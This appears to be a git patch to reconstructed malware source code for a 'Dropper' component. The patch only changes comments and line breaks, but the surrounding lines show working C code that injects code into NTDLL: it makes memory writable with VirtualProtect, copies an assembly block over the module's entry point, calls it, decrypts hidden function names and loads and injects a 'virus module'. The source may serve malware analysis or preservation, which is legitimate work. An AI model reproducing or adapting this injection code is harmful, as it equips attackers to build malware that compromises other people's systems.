From b39a58ef6a0a093409c7f191e3e812403e13a4fc Mon Sep 17 00:00:00 2001 From: "Michael R. Torres" Date: Tue, 11 Oct 2016 20:11:22 -0700 Subject: [PATCH] Update comments on the injection process --- Dropper/AssemblyBlock0.c | 3 ++- Dropper/CodeBlock.c | 4 ++-- Dropper/MemorySections.c | 11 ++++++----- 3 files changed, 10 insertions(+), 8 deletions(-) diff --git a/Dropper/AssemblyBlock0.c b/Dropper/AssemblyBlock0.c index cb5c60e..4399860 100644 --- a/Dropper/AssemblyBlock0.c +++ b/Dropper/AssemblyBlock0.c @@ -21,7 +21,8 @@ ** ASSEMBLY BLOCK 0. ** *************************************************************************/ -// This is the first bit of code injected into NTDLL at base + 16 +// This replaces the builtin MSDOS stub that usually checks for compatability +// ( the infamous "This program cannot be run in DOS mode") void __declspec(naked) __ASM_BLOCK0_0(void) { __asm diff --git a/Dropper/CodeBlock.c b/Dropper/CodeBlock.c index 0461c29..e8544f9 100644 --- a/Dropper/CodeBlock.c +++ b/Dropper/CodeBlock.c @@ -223,7 +223,7 @@ INT32 BLOCK4_InjectCodeIntoNTDLL(ASM_CODE_BLOCKS_HEADER *sASMCodeBlocksHeader, P hHandleNTDLL = pHardAddrs->NTDLL_DLL; if(!pHardAddrs->NTDLL_DLL) return 0; - NTDLL_Entry = (void *)(hHandleNTDLL + 16); // Presumably the entry point + NTDLL_Entry = (void *)(hHandleNTDLL + 16); if(*(_DWORD *)(hHandleNTDLL + 16) == 0xAB49103B) return 0; // Check if the code has been already injected if(pHardAddrs->VirtualProtect(hHandleNTDLL, 0x1000, PAGE_EXECUTE_WRITECOPY, &dwOld)) @@ -231,7 +231,7 @@ INT32 BLOCK4_InjectCodeIntoNTDLL(ASM_CODE_BLOCKS_HEADER *sASMCodeBlocksHeader, P // Copy code into ntdll entry point... BLOCK4_memcpy(NTDLL_Entry, (const void *)sASMCodeBlocksHeader->ASMBlock0Segment.SegmentAddress, sASMCodeBlocksHeader->ASMBlock0Segment.SegmentSize); - // ...then call __ASM_BLOCK1_0 with a pointer to the entry point as ECX because __thiscall + // ...then call __ASM_BLOCK1_0 with a pointer to the entry point as ECX( because __thiscall ) ((void (__thiscall *)(void *))sASMCodeBlocksHeader->ASMBlock1Segment.SegmentAddress)(NTDLL_Entry); // __thiscall ignored by compiler pHardAddrs->FlushInstructionCache((HANDLE)-1, NULL, 0); diff --git a/Dropper/MemorySections.c b/Dropper/MemorySections.c index e96665b..17c09a4 100644 --- a/Dropper/MemorySections.c +++ b/Dropper/MemorySections.c @@ -207,14 +207,16 @@ INT32 Setup(LPCWSTR szDebugModuleName, PVOID pVirusModule, UINT32 iVirusModuleSi GENERAL_INFO_BLOCK sInfoBlock; // [sp+4h] [bp-80h]@1 // Get a random module name with the format "KERNEL32.DLL.ASLR.XXXXXXXX" - if(GetRandomModuleName(&sInfoBlock, szDebugModuleName) != 0) return 0; + if(GetRandomModuleName(&sInfoBlock, szDebugModuleName) != 0) + return 0; // Decrypt the Kernel32's and NTDLL's function names - if(bSetup && DecodeEncryptedModuleNames() == FALSE) return -12; + if(bSetup && DecodeEncryptedModuleNames() == FALSE) + return -12; - // Last 4 arguments seem to have been mangled, as -1 is a nonsensical index. iResult = LoadVirusModuleSection(GetCurrentProcess(), &sInfoBlock, pVirusModule, iVirusModuleSize, -1, NULL, 0, &s_virusBlocksPTR); - if(iResult) return iResult; + if(iResult) + return iResult; // One-time if(bSetup) @@ -225,7 +227,6 @@ INT32 Setup(LPCWSTR szDebugModuleName, PVOID pVirusModule, UINT32 iVirusModuleSi bSetup = FALSE; } - // Unknown iResult = LoadAndInjectVirus((PASM_CODE_BLOCKS_HEADER)s_ASMCodeBlocksPTR, (PVIRUS_MODULE_BLOCKS_HEADER)s_virusBlocksPTR, &sInfoBlock); if(!iResult) *hVirusModule = ((PVIRUS_MODULE_BLOCKS_HEADER)s_virusBlocksPTR)->VirusModulePointer;